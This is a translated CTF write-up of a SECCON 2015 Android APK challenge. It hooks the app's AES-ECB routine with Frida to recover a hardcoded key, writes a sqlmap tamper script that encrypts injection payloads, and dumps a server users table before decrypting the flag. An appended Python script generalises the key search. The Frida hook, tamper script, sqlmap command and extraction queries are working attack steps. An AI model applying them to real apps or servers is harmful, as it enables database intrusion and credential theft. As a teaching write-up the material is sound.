SECCON 2015 CTF Selection: A 400-point Android APK reverse question | focus on hackers and geeks

Source: Internet
Author: User


This is the second "Android APK reverse" question of the SECCON 2015 CTF qualifier, worth 400 points. The prompt is: "The key is stored in the application, but you need to hack the server."

First, I installed the APK to see what it can do, and found only two functions: registration and login. The application's package name is "kr.repo.h2spice.yekehtmai".

(Screenshot: the application's login screen)

While using the application, I noticed that entering a single quotation mark in the "email" field makes a JSON error appear in the message box. This suggests that the server has a SQL injection vulnerability. However, I soon realized that it was blind injection, and typing payloads by hand into the Android app would be far too tedious.

I set up a proxy to record the HTTP traffic; the application talks to the server over plain HTTP. However, the POST data parameters are encrypted in some form.


The next step is to decompile the APK. I used dex2jar and then loaded the resulting JAR into JD-GUI to read the decompiled classes. Looking at the code, the classes appear to be obfuscated.

Later, I came across the class "kr.repo.h2spice.yekehtmai.c", which implements AES encryption in ECB mode. This class is called during login and registration. Its method "a" takes two parameters: the plaintext POST parameter and the AES key.


The AES key is not stored statically in the application; it is obscured by a long chain of other "encoding/encryption" steps. At this point I weighed my options: attach a debugger, inject some smali code, or use dynamic instrumentation. Attaching a debugger is more work: decompile the APK to smali with apktool, repackage it with debugging information, and run the app in debug mode from an IDE. Injecting smali code also requires repackaging the APK. Fortunately, Frida supports dynamic instrumentation and lets you hook code with JavaScript on many platforms, including Android.

I used the following script to hook the "kr.repo.h2spice.yekehtmai.c.a" method:

    // Note: the "Dalvik" namespace used here belongs to Frida releases of that time;
    // later Frida versions renamed it to "Java".
    Dalvik.perform(function () {
        var c = Dalvik.use("kr.repo.h2spice.yekehtmai.c");
        // Replace the encryption method with a hook that logs its arguments:
        // str1 is the plaintext POST parameter, str2 is the AES key.
        c.a.implementation = function (str1, str2) {
            console.log("String1: " + str1);
            console.log("String2: " + str2);
            // Call the original implementation so the app still gets its ciphertext.
            return this.a(str1, str2);
        };
    });

Start the frida-server on the Android device, run "frida -U kr.repo.h2spice.yekehtmai", and load the JavaScript hook:


Now, when we log in, we can see the encryption routine being called on the parameters, and the hook prints them to the console. I used "test" as both the user name and the password, and obtained the AES key "3246847986364861" used to encrypt the POST parameters.

With the key, we can encrypt our own POST parameters and use them for SQL injection. Because it is blind injection, I use sqlmap. One of its features is tamper scripts, which modify each payload before it is sent to the server.

As follows:

    #!/usr/bin/env python

    from lib.core.data import kb
    from lib.core.enums import PRIORITY

    import base64
    from Crypto.Cipher import AES

    BS = 16
    # PKCS#7 padding, matching what the app's encryption routine produces.
    pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)

    class AESCipher:
        def __init__(self, key):
            self.key = key.encode()

        def encrypt(self, raw):
            raw = pad(raw).encode()
            cipher = AES.new(self.key, AES.MODE_ECB)
            return base64.b64encode(cipher.encrypt(raw)).decode()

    __priority__ = PRIORITY.NORMAL

    def dependencies():
        pass

    def tamper(payload, **kwargs):
        # Encrypt each payload with the AES key recovered through the Frida hook,
        # so the server receives exactly the format the app sends.
        retVal = payload
        if payload:
            retVal = AESCipher("3246847986364861").encrypt(payload)
        return retVal

Now we run sqlmap with the tamper script, for example: sqlmap.py -u "hxxp://apkhost/login.php" --data="email=xxx&password=xxx" --tamper=seccon --sql-shell. sqlmap detects a time-based blind injection. This process is slow, however; I left a non-time-based option aside, which might be a better technique.

I used sqlmap to dump the name of the current database, confirm that a "users" table exists, and enumerate its columns. Then I queried the first row of the "users" table, which might be an administrator account, and found the user "iamthekey".

    > SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name="users" and table_schema="seccon2015"
    [*] id,unique_id,name,email,encrypted_password,salt,created_at,updated_at
    > SELECT name FROM users WHERE length(name)>1 ORDER BY id ASC LIMIT 1
    [*] iamthekey
    > SELECT id,unique_id,email,encrypted_password,salt FROM users where name="iamthekey" LIMIT 1
    [*] 4, a159c1f7097ba80403d29e7, [email protected], MQL7ZF5Ec5uehudP0L0t//zZwykyNGYxMjgyNDAz, 24f1282403

Even with this information, I still did not know what to do next. Recall the prompt: "the key is stored in the application". I went back to the decompiled APK code and noticed the "WelcomeActivity" class.


Based on the current "uid" string, the application tries to decrypt the string "fuO/gyps1L1JZwet4jYaU0hNvIxa/ncffqy+3fEHIn4=". So we need the "uid" of the "iamthekey" user to decrypt it.

Now we need to figure out which substring of the "uid" is the key. The "uid" is 23 characters long, but an AES-128 key is 16 bytes (one block), so we simply try every 16-character window ourselves.

    from Crypto.Cipher import AES
    import base64

    uid = "a159c1f7097ba80403d29e7"
    raw = base64.b64decode("fuO/gyps1L1JZwet4jYaU0hNvIxa/ncffqy+3fEHIn4=")
    # A 23-character uid has 8 possible 16-character windows (offsets 0..7);
    # try each one as the AES key and print whatever comes out.
    for i in range(len(uid) - 16 + 1):
        print(AES.new(uid[i:i + 16].encode(), AES.MODE_ECB).decrypt(raw))

Then run the Python script:

    $ python decrypt.py | strings
    SECCON{6FgshufUTpRm}

Aha, this is the flag we wanted! :P
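As an added example (not part of the original write-up and not the challenge's code), the script below brings the two transforms used above into one place: the PKCS#7 + AES-ECB + base64 encryption that the tamper script applies to each payload, and the key-window search over a uid, generalized so that each candidate window is validated by its padding and printability instead of being filtered through "strings". It also includes the classic check for repeated ciphertext blocks, the tell-tale sign of ECB mode that a reviewer would look for in any app that rolls its own transport encryption. It assumes pycryptodome (as the original scripts do) or, failing that, the "cryptography" package; the uid, key offset and flag used in the demo are constructed values, not the challenge's.

```python
import base64

# Assumption: pycryptodome (or legacy PyCrypto) is installed, as in the
# write-up's own scripts; if not, fall back to the 'cryptography' package.
try:
    from Crypto.Cipher import AES as _AES

    def _aes_ecb(key: bytes, data: bytes, encrypt: bool) -> bytes:
        cipher = _AES.new(key, _AES.MODE_ECB)
        return cipher.encrypt(data) if encrypt else cipher.decrypt(data)
except ImportError:
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def _aes_ecb(key: bytes, data: bytes, encrypt: bool) -> bytes:
        cipher = Cipher(algorithms.AES(key), modes.ECB())
        op = cipher.encryptor() if encrypt else cipher.decryptor()
        return op.update(data) + op.finalize()

BS = 16  # AES block size; also the AES-128 key length the app uses


def pkcs7_pad(data: bytes) -> bytes:
    n = BS - len(data) % BS
    return data + bytes([n]) * n


def pkcs7_unpad(data: bytes):
    """Return the unpadded bytes, or None when the padding is malformed."""
    if not data or len(data) % BS:
        return None
    n = data[-1]
    if not 1 <= n <= BS or data[-n:] != bytes([n]) * n:
        return None
    return data[:-n]


def ecb_encrypt_b64(key: str, plaintext: str) -> str:
    """The transform the tamper script applies: PKCS#7, AES-ECB, base64."""
    ct = _aes_ecb(key.encode(), pkcs7_pad(plaintext.encode()), True)
    return base64.b64encode(ct).decode()


def ecb_decrypt_b64(key: bytes, ct_b64: str):
    """Decrypt and unpad; None means this key did not yield valid padding."""
    pt = _aes_ecb(key, base64.b64decode(ct_b64), False)
    return pkcs7_unpad(pt)


def find_key_windows(uid: str, ct_b64: str):
    """Try every 16-character window of uid as the key.

    A wrong key produces pseudo-random bytes, which almost never carry valid
    PKCS#7 padding *and* decode to printable ASCII, so this filter replaces
    the '| strings' trick with an explicit check.
    Returns a list of (offset, key, plaintext) candidates.
    """
    hits = []
    for i in range(len(uid) - BS + 1):
        key = uid[i:i + BS].encode()
        pt = ecb_decrypt_b64(key, ct_b64)
        if pt is None:
            continue
        try:
            text = pt.decode("ascii")
        except UnicodeDecodeError:
            continue
        if text.isprintable():
            hits.append((i, key.decode(), text))
    return hits


def has_repeated_blocks(ct_b64: str) -> bool:
    """ECB tell-tale: identical plaintext blocks give identical ciphertext blocks."""
    ct = base64.b64decode(ct_b64)
    blocks = [ct[i:i + BS] for i in range(0, len(ct), BS)]
    return len(blocks) != len(set(blocks))


if __name__ == "__main__":
    # Constructed demo values (not the challenge's real uid or ciphertext):
    # a 23-character uid with the key hidden at offset 4.
    demo_uid = "0123456789abcdef0123456"
    demo_key = demo_uid[4:20]
    demo_ct = ecb_encrypt_b64(demo_key, "SECCON{constructed_flag}")
    for offset, key, text in find_key_windows(demo_uid, demo_ct):
        print(f"offset {offset}: key={key!r} -> {text!r}")
    print("repeated blocks:", has_repeated_blocks(ecb_encrypt_b64(demo_key, "A" * 32)))
```

The padding check is what makes the window search reliable: of the eight candidate keys, only the right one yields a block that ends in a well-formed PKCS#7 suffix and printable text, so no eyeballing of "strings" output is needed. The repeated-block check is the same property that lets an observer spot ECB on the wire, which is why a fixed per-app AES key in ECB mode gives the server no real protection once the key is hooked out of the process.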

* Original article by cedricvb, translated by xiaosun flower. For details, see FreeBuf hacker and geek (FreeBuf.COM).
